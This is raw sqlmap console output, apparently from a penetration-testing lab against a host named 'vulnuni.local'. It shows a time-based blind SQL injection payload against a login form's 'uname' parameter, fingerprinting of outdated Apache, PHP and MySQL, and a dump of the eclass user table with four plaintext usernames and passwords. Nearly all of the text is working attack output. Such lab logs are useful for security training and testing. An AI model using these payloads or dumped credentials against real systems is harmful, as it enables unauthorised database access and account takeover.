        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.10#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:37:06 /2026-02-20/

[11:37:06] [INFO] parsing HTTP request from '/home/kali/Desktop/login_request.txt'
[11:37:06] [INFO] resuming back-end DBMS 'mysql' 
[11:37:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 2927 FROM (SELECT(SLEEP(5)))lyCd)-- Atif&pass=test&submit=Enter
---
[11:37:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 or 12.10 or 13.04 (Quantal Quetzal or Precise Pangolin or Raring Ringtail)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[11:37:06] [INFO] fetching entries of column(s) 'password,statut,username' for table 'user' in database 'eclass'
[11:37:06] [INFO] fetching number of column(s) 'password,statut,username' entries for table 'user' in database 'eclass'

[11:37:06] [INFO] retrieved: [11:37:06] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[11:37:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4

[11:37:15] [INFO] retrieved: [11:37:15] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[11:37:31] [INFO] adjusting time delay to 1 second due to good response times
ilikecats89

[11:38:02] [INFO] retrieved: 1

[11:38:04] [INFO] retrieved: admin

[11:38:19] [INFO] retrieved: smith.j.1971

[11:39:05] [INFO] retrieved: 1

[11:39:07] [INFO] retrieved: smith.j

[11:39:35] [INFO] retrieved: hf74nd9dmw

[11:40:13] [INFO] retrieved: 5

[11:40:16] [INFO] retrieved: garris.e

[11:40:42] [INFO] retrieved: i74nw02nm3

[11:41:20] [INFO] retrieved: 5

[11:41:23] [INFO] retrieved: perez.s
Database: eclass
Table: user
[4 entries]
+----------+--------------+--------+
| username | password     | statut |
+----------+--------------+--------+
| admin    | ilikecats89  | 1      |
| smith.j  | smith.j.1971 | 1      |
| garris.e | hf74nd9dmw   | 5      |
| perez.s  | i74nw02nm3   | 5      |
+----------+--------------+--------+

[11:41:50] [INFO] table 'eclass.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/vulnuni.local/dump/eclass/user.csv'
[11:41:50] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/vulnuni.local'

[*] ending @ 11:41:50 /2026-02-20/

